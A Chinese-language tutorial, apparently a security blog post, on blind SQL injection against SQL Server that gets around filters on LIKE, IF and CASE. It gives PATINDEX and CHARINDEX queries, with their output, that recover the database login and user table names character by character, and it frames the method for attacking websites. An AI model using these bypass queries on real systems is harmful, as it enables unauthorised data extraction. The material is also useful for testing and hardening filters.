0x00 概要

日站过程中有过滤是很正常的事情.

本方法适用于 过滤了 like, if, CASE

也就是 like 注入无法正常使用,但是页面又没有回显的情况

like 替换方法 解释
PATINDEX(‘%pattern%’, expression) 返回pattern字符串在表达式expression里第一次出现的位置,起始值从1开始算,没有返回0

该函数与 like 高度保持一致,并且可以和 like 一样
使用 _ % [ ] [^]这种通配符进行搜索
CHARINDEX(‘pattern’, expression) 返回pattern字符串在表达式expression里第一次出现的位置,起始值从1开始算,没有返回0

0x02 测试数据

  1. 1> select * from article;
  2. 2> go
  3. +----+-----------+-----------+
  4. | id | title | content |
  5. +----+-----------+-----------+
  6. | 1 | 测试标题 | 测试内容 |
  7. | 2 | 测试标题2 | 测试内容2 |
  8. +----+-----------+-----------+
  9. (2 rows affected)
  1. # 测试表数据: users;
  2. sql server> select * from users;
  3. +----+--------------+----------+
  4. | id | username | password |
  5. +----+--------------+----------+
  6. | 1 | test-user-01 | 123456 |
  7. | 2 | test-user-02 | 234567 |
  8. +----+--------------+----------+
  9. 2 rows in set (0.00 sec)
  1. sql server> SELECT system_user;
  2. +-----------------------+
  3. | field1 |
  4. +-----------------------+
  5. | sa |
  6. +-----------------------+
  7. 1 row in set (0.00 sec)
  1. sql server> select db_name();
  2. +-----------------------+
  3. | field1 |
  4. +-----------------------+
  5. | test |
  6. +-----------------------+
  7. 1 row in set (0.00 sec)

0x02 PATINDEX()

0x02.1 查询user

SQL:select ‘test’ where patindex(‘%sa%’, system_user)>=1;

  1. # system_user = sa
  2. # 对的情况
  3. 1> select 'test' where patindex('%sa%', system_user)>=1;
  4. 2> go
  5. +-----+
  6. | |
  7. +-----+
  8. | test |
  9. +-----+
  10. (1 rows affected)
  11. # 错误的情况
  12. 1> select 'test' where patindex('%aaa%', system_user)>=1;
  13. 2> go
  14. +--+
  15. | |
  16. +--+
  17. +--+
  18. (0 rows affected)

0x02.2 查询表名

注意:
OVER(Order by table_name) 里面的 name 要修改为 test.dbo.sysobjects 表里面存在的一个字段
查询不同的库可以这样

例如现在有 test库 与 test2库
那么就可以这样调用
test.dbo.sysobjects
test2.dbo.sysobjects

查询不同的表可以这样
例如:
修改 row_number>=1
修改 row_number>=2

注意:
XType=’U’ 表示获取某数据库的所有用户表;
XType=’S’ 表示获取某数据库的所有系统表;
例如现在查询得是 test 库得表名

SQL:select ‘test’ where patindex(‘%article%’, (select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1))>=1

  1. # 第一张表名 = article
  2. # 对的情况
  3. 1> SELECT
  4. 'test'
  5. WHERE
  6. patindex(
  7. '%article%',
  8. (
  9. SELECT
  10. name
  11. FROM
  12. (
  13. SELECT
  14. ROW_NUMBER () OVER (ORDER BY name) AS row_number,
  15. name
  16. FROM
  17. test.dbo.sysobjects
  18. WHERE
  19. XType = 'U'
  20. ) AS a
  21. WHERE
  22. row_number = 1
  23. )
  24. ) >= 1;
  25. 2> go
  26. +-----+
  27. | |
  28. +-----+
  29. | test |
  30. +-----+
  31. (1 rows affected)
  32. # 错误的情况
  33. 1> SELECT
  34. 'test'
  35. WHERE
  36. patindex(
  37. '%aaaaaaaaaaaaaa%',
  38. (
  39. SELECT
  40. name
  41. FROM
  42. (
  43. SELECT
  44. ROW_NUMBER () OVER (ORDER BY name) AS row_number,
  45. name
  46. FROM
  47. test.dbo.sysobjects
  48. WHERE
  49. XType = 'U'
  50. ) AS a
  51. WHERE
  52. row_number = 1
  53. )
  54. ) >= 1;
  55. 2> go
  56. +--+
  57. | |
  58. +--+
  59. +--+
  60. (0 rows affected)

0x03 CHARINDEX()

0x03.1 查询user

SQL:select ‘test’ where charindex(‘s’, system_user)>=1

  1. # system_user = sa
  2. # 对的情况
  3. # system_user第一个字符
  4. 1> select 'test' where charindex('s', system_user)>=1
  5. 2> go
  6. +-----+
  7. | |
  8. +-----+
  9. | test |
  10. +-----+
  11. (1 rows affected)
  12. # system_user第二个字符
  13. 1> select 'test' where charindex('sa', system_user)>=1
  14. 2> go
  15. +-----+
  16. | |
  17. +-----+
  18. | test |
  19. +-----+
  20. (1 rows affected)
  21. # 错误的情况
  22. 1> select 'test' where charindex('aaaaa', system_user)>=1
  23. 2> go
  24. +--+
  25. | |
  26. +--+
  27. +--+
  28. (0 rows affected)

0x03.2 查询表名

SQL:select ‘test’ where charindex(‘ar’, (select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1))>=1

  1. # 第一张表名 = article
  2. # 对的情况
  3. # 查询前1-2字符
  4. 1> SELECT
  5. 'test'
  6. WHERE
  7. charindex(
  8. 'ar',
  9. (
  10. SELECT
  11. name
  12. FROM
  13. (
  14. SELECT
  15. ROW_NUMBER () OVER (ORDER BY name) AS row_number,
  16. name
  17. FROM
  18. test.dbo.sysobjects
  19. WHERE
  20. XType = 'U'
  21. ) AS a
  22. WHERE
  23. row_number = 1
  24. )
  25. ) >= 1;
  26. 2> go
  27. +-----+
  28. | |
  29. +-----+
  30. | test |
  31. +-----+
  32. (1 rows affected)
  33. # 查询1-4个字符
  34. 1> SELECT
  35. 'test'
  36. WHERE
  37. charindex(
  38. 'arti',
  39. (
  40. SELECT
  41. name
  42. FROM
  43. (
  44. SELECT
  45. ROW_NUMBER () OVER (ORDER BY name) AS row_number,
  46. name
  47. FROM
  48. test.dbo.sysobjects
  49. WHERE
  50. XType = 'U'
  51. ) AS a
  52. WHERE
  53. row_number = 1
  54. )
  55. ) >= 1;
  56. 2> go
  57. +-----+
  58. | |
  59. +-----+
  60. | test |
  61. +-----+
  62. (1 rows affected)